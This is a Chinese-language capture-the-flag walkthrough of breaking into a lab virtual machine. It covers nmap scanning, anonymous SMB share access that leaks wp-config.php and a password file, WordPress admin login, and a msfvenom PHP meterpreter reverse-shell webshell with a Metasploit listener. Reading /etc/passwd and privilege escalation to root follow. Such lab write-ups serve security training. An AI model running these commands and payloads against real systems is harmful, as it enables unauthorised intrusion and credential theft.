SMB信息泄露

SMB信息泄露

1.确保攻击机和靶机处在同局域网/ 首先使用ifconfig命令查看本机IP地址

SMB信息泄露_第1张图片

2.使用 nmap -sn -PE 192.168.56.0/24命令然后扫出靶机IP:192.168.56.103

SMB信息泄露_第2张图片

3.使用nmap -sV 192.168.56.103 命令扫描靶机开放的服务端口

SMB信息泄露_第3张图片

我们发现目标靶机有22,80,139,445,3306,6667 几个可能有用的端口开放,其中139和445进行的SMB服务

其中,使用计算机名访问时,SMB服务工作在NetBIOS协议之上,用的是TCP的139端口;使用IP地址访问时,用的是TCP的445端口。

针对SMB协议弱点分析
4.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看:
smbclient -L IP           //查看SMB文件目录
smbclient '\\IP\$share'   //查看SMB文件
get 敏感文件               //下载文件
5.针对SMB协议远程溢出漏洞进行分析
searchsploit samba版本号 //搜索smb远程溢出漏洞
6.使用命令: smbclient -L 192.168.56.103尝试空口令登录

SMB信息泄露_第4张图片

7.使用命令:smbclient '\\192.168.56.103\share$' 空命令进入查看目录

SMB信息泄露_第5张图片

8. 注意本目录下的deets.txt和wordpress目录下的wp-config.php ,这里将其下载到kali上

在这里插入图片描述

在这里插入图片描述

9. 打开deets.txt文件,找到一个密码信息:12345 也许有用

SMB信息泄露_第6张图片

10.打开 wp-config.php文件,里面存有数据库的一些配置信息,我们找到数据库的账号密码。

SMB信息泄露_第7张图片

使用命令:searchsploit samba版本号 尝试搜索存在的漏洞 发现不存在

SMB信息泄露_第8张图片


深度挖掘

针对HTTP协议弱点分析
1.浏览器查看网站
2.使用dirb或nikto探测
3.寻找突破点,目标登陆后台,上传webshell

dirb http://192.168.56.103     //查看靶机目录
1.发现可疑目录,尝试浏览器打开

在这里插入图片描述

2.使用刚才 wp-config.php文件中的用户 密码 发现成功登录

SMB信息泄露_第9张图片

3.我们进入了后台之后,在kali制作webshell 使用如下命令
 msfvenom -p php/meterpreter/reverse_tcp lhost= 本机IP lport=4444 -f raw

将制作好的webshell保存在桌面,以便使用
SMB信息泄露_第10张图片

4. 启动metasploit,然后启动监听:
msfconsole                           //启动metasploit
msf > use exploit/multi/handler      //调用模块
msf exploit(handler) > set payload php/meterpreter/reverse_tcp    
msf exploit(handler) > set lhost kali机IP
msf exploit(handler) > set lport 4444           //端口
msf exploit(handler) > run

SMB信息泄露_第11张图片

5.kali正在监听4444端口,接下来,我们上传webshell。打开火狐浏览器,进入后台页面,将404模板跟换为改成的webshell

SMB信息泄露_第12张图片

6.接下来进入kali 发现监听成功 然后进入shell,发现用户权限不够,于是想到提权

SMB信息泄露_第13张图片

python -c "import pty;pty.spawn('/bin/bash')"       #美化shell改成终端模式
7.使用命令 cat /etc/passwd查看用户信息,发现home目录下存在togie用户
cat  /etc/passwd
landscape:x:103:109::/var/lib/landscape:/bin/false
togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
8. 我们切换成该用户,使用deets.txt的密码12345,成功切换

在这里插入图片描述

9.尝试切换root用户,进入root目录

在这里插入图片描述

10.cd到root目录,看到有proof.txt文件,打开文件拿到flag

SMB信息泄露_第14张图片

你可能感兴趣的:(系统安全)